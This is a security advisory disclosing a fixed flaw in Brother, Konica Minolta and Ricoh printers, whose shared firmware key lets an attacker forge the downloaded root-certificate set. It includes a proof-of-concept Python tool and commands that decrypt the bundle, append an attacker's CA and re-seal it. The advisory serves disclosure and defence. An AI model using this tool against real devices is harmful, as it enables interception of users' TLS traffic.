-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2025-007
Product: Multiple products are affected (see [1], [2], [3])
Manufacturer: Brother Industries, Ltd., Konica Minolta, Inc., Ricoh Company, Ltd.
Affected Version(s): Versions depend on the vulnerable product and vendor (see [1], [2], [3])
Tested Version(s): 1.17 of the Brother HL-L2400DW Printer
Vulnerability Type: Improper Certificate Validation (CWE-295)
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2025-02-13
Solution Date: 2026-01-29
Public Disclosure: 2026-01-29
CVE Reference: CVE-2025-53869
Author of Advisory: Jan Wütherich, Albstadt-Sigmaringen University

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The Brother HL-L2400DW Printer is a laser printer with networking
capabilities.

The manufacturer describes the product as follows (see [4]):

"The HL-L2400DW is designed to increase efficiency, with fast print speeds
helping you to work smarter. The 2-sided print feature saves you time,
enabling you to get on with other tasks. Make your day easier and your
printing effortless, with simple set up and 5GHz WiFi or USB connection.
This efficient HL-2400DW is a breeze to operate using the easy to navigate
control panel."

Due to the use of a hardcoded cryptographic key and no verification of
data authenticity, an attacker with the capability to intercept network
connections between the printer and a remote server could replace the
remotely fetched root certificate set with attacker-controlled
certificates. By modifying root certificates, an attacker could intercept
and extract communications from Brother online services, such as Email
Print.

While SySS verified the vulnerability for the Brother HL-L2400DW Printer
with firmware version 1.17, multiple devices from multiple manufacturers
are affected by the same issue (see [1], [2], [3]).
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The Brother HL-L2400DW Printer retrieves a set of root certificates from a
remote server at every boot and stores them in memory. It periodically
checks the server for a newer version of the certificate set and downloads
a newer version if available.

This connection is made using HTTPS, but the server certificate is not
verified. This is likely because the device does not store any root
certificates when the certificate set is initially retrieved, or because
the current certificates might already be expired or revoked.

The certificate set is encrypted with AES-256-CBC, with an appended
HMAC-SHA256 over the encrypted data. Since both encryption and HMAC
operations are symmetric, an attacker with access to the keys can encrypt
and generate a valid HMAC for their own certificate set. These keys are
identical across all devices and can be extracted from the disassembled
firmware.

Thus, an attacker with the capability to intercept network connections
could replace the root certificate set retrieved from the remote server
with a custom one.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following proof-of-concept software was developed to decrypt and
encrypt certificate sets. The required cryptographic material was manually
extracted from the disassembled firmware.
#!/usr/bin/env python3
# certfiletool.py: decrypt/encrypt a printer root certificate set.
# Bundle layout: AES-256-CBC ciphertext followed by a 32-byte HMAC-SHA256
# tag over the ciphertext. Requires pycryptodome (Crypto.*) and a local
# keys.py module providing CERT_KEY, CERT_IV and HMAC_KEY, the material
# extracted from the disassembled firmware (not included in this advisory).
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
import hmac
import hashlib
import argparse
import keys


def decrypt(source, dest):
    with open(source, "rb") as f:
        data = f.read()

    # Last 32 bytes are the HMAC-SHA256 tag, everything before is ciphertext.
    body = data[:-0x20]
    expected_hmac = data[-0x20:]

    h = hmac.new(keys.HMAC_KEY, body, hashlib.sha256)
    if not hmac.compare_digest(h.digest(), expected_hmac):
        raise Exception("[-] Expected HMAC does not match!")

    print("[+] Decrypting certificate file")
    cipher = AES.new(keys.CERT_KEY, AES.MODE_CBC, iv=keys.CERT_IV[:16])
    decrypted = unpad(cipher.decrypt(body), 16)

    with open(dest, "wb") as f:
        f.write(decrypted)

    print("[+] The certificate file was successfully decrypted")


def encrypt(source, dest):
    with open(source, "rb") as f:
        data = f.read()

    print("[+] Encrypting certificate file")
    cipher = AES.new(keys.CERT_KEY, AES.MODE_CBC, iv=keys.CERT_IV[:16])
    encrypted = cipher.encrypt(pad(data, 16))

    # The tag is computed over the ciphertext and appended to it.
    print("[+] Generating HMAC")
    h = hmac.new(keys.HMAC_KEY, encrypted, hashlib.sha256)

    with open(dest, "wb") as f:
        f.write(encrypted)
        f.write(h.digest())

    print("[+] The certificate file was successfully encrypted")


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    subparsers = parser.add_subparsers(dest="mode")
    subparsers.required = True

    decrypt_parser = subparsers.add_parser("decrypt")
    decrypt_parser.add_argument("source", help="Source filename")
    decrypt_parser.add_argument("dest", help="Destination filename")

    encrypt_parser = subparsers.add_parser("encrypt")
    encrypt_parser.add_argument("source", help="Source filename")
    encrypt_parser.add_argument("dest", help="Destination filename")

    # Dispatch to decrypt() or encrypt() based on the chosen subcommand.
    kwargs = vars(parser.parse_args())
    globals()[kwargs.pop("mode")](**kwargs)

After decryption, the file contains multiple PEM-encoded root certificates.
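As an added illustration that is not part of the SySS advisory or any vendor's code, the following Python reproduces the bundle layout described under Vulnerability Details (AES-256-CBC ciphertext with a trailing 32-byte HMAC-SHA256 tag) on constructed demo keys and sets it beside a variant in which the device holds only an Ed25519 public key: the HMAC check necessarily needs the same key that produces valid tags, so a firmware-wide key cannot prove where a bundle came from, whereas a signature verifier cannot produce signatures. It uses the cryptography library; all keys and the sample PEM are constructed placeholders, not values from the device.

```python
import hashlib
import hmac
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

TAG_LEN = 32  # HMAC-SHA256 tag appended to the ciphertext, as in the advisory
DEMO_CERT_KEY = bytes(range(32))                      # constructed AES-256 key, not the device key
DEMO_IV = bytes(16)                                   # constructed 16-byte CBC IV
DEMO_HMAC_KEY = b"shared-secret-on-every-device!!!"  # constructed 32-byte HMAC key
SAMPLE_PEM = b"-----BEGIN CERTIFICATE-----\nQ09OU1RSVUNURUQ=\n-----END CERTIFICATE-----\n"  # placeholder

def aes_cbc_encrypt(key, iv, plaintext):
    padder = padding.PKCS7(128).padder()
    enc = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
    return enc.update(padder.update(plaintext) + padder.finalize()) + enc.finalize()

def aes_cbc_decrypt(key, iv, ciphertext):
    dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    unpadder = padding.PKCS7(128).unpadder()
    return unpadder.update(dec.update(ciphertext) + dec.finalize()) + unpadder.finalize()

def seal_hmac_bundle(cert_key, iv, hmac_key, pem):
    # Advisory layout: AES-256-CBC ciphertext || HMAC-SHA256(hmac_key, ciphertext)
    body = aes_cbc_encrypt(cert_key, iv, pem)
    return body + hmac.new(hmac_key, body, hashlib.sha256).digest()

def open_hmac_bundle(cert_key, iv, hmac_key, blob):
    # Device-side check: it needs hmac_key, the very key seal_hmac_bundle() uses.
    body, tag = blob[:-TAG_LEN], blob[-TAG_LEN:]
    if not hmac.compare_digest(hmac.new(hmac_key, body, hashlib.sha256).digest(), tag):
        return None
    return aes_cbc_decrypt(cert_key, iv, body)

def generate_signing_key():
    return Ed25519PrivateKey.generate()  # stays with the update server, never on devices

def seal_signed_bundle(cert_key, iv, signing_key, pem):
    body = aes_cbc_encrypt(cert_key, iv, pem)
    return body + signing_key.sign(body)  # 64-byte Ed25519 signature replaces the tag

def open_signed_bundle(cert_key, iv, verify_key, blob):
    # Device-side check holding only the public key: it can verify but not sign.
    body, sig = blob[:-64], blob[-64:]
    try:
        verify_key.verify(sig, body)
    except InvalidSignature:
        return None
    return aes_cbc_decrypt(cert_key, iv, body)
```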
The following output demonstrates the process of decrypting the original
certificate set, appending a custom certificate authority, re-encrypting
the certificate set, and updating the HMAC:

$ python ./certfiletool.py decrypt ./certfile ./certfile_decrypted
[+] Decrypting certificate file
[+] The certificate file was successfully decrypted
$ cat ./root.pem >> ./certfile_decrypted
$ python ./certfiletool.py encrypt ./certfile_decrypted ./certfile
[+] Encrypting certificate file
[+] Generating HMAC
[+] The certificate file was successfully encrypted

After adding the attacker's certificate to the printer's root certificate
bundle, machine-in-the-middle attacks against the TLS-based communication
between the printer and remote servers are possible.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update to the latest firmware version of the affected device (see [1],
[2], [3]).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2025-01-09: Vulnerability discovered
2025-02-13: Vulnerability reported to manufacturer
2026-01-29: Patch released by manufacturer
2026-01-29: Public disclosure of vulnerability by manufacturer
2026-02-02: Public disclosure of vulnerability by SySS

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Affected Brother Industries, Ltd. devices
    https://faq.brother.co.jp/app/answers/detail/a_id/13716
    https://faq.brother.co.jp/euf/assets/pdf/13716%E2%80%9720260128.pdf
[2] Affected Konica Minolta, Inc. devices
    https://www.konicaminolta.com/global-en/security/advisory/pdf/km-2026-0001.pdf
[3] Affected Ricoh Company, Ltd. devices
    https://www.ricoh.com/products/security/vulnerabilities/vul?id=ricoh-2026-000001
[4] Datasheet for HL-L2400DW
    https://www.brother.eu/-/media/Product-Downloads/Devices/Printers/HL/HLL2400DW/HL-L2400DW---Datasheet.ashx
[5] SySS Security Advisory SYSS-2025-007
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-007.txt
[6] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was discovered by students of the
Albstadt-Sigmaringen University in cooperation with SySS GmbH.

Jan Wütherich - jan[at]wuetherich[dot]de, wuetheja@hs-albsig.de
Manuel Schuttenberg - manuel[at]schuttenberg[dot]net, schuttma@hs-albsig.de
Simon Häupler - haeuplsi@hs-albsig.de
Marvin Härter - haertema@hs-albsig.de
Silas Feuerherdt - feuerhsi@hs-albsig.de
Timm Ditz - ditztimm@hs-albsig.de
Saeed Brezek - brezeksa@hs-albsig.de

Supervised by:
Simon Malik - maliks@hs-albsig.de
Prof. Holger Morgenstern - morgenstern@hs-albsig.de

Contact SySS GmbH:
E-Mail: anton.fabricius@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Anton_Fabricius.asc
Key ID: 0xB2ED52BF0DEAC709
Key Fingerprint: 3476 F352 EBC1 F702 5048 B573 B2ED 52BF 0DEA C709

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 4.0
URL: https://creativecommons.org/licenses/by/4.0/deed.en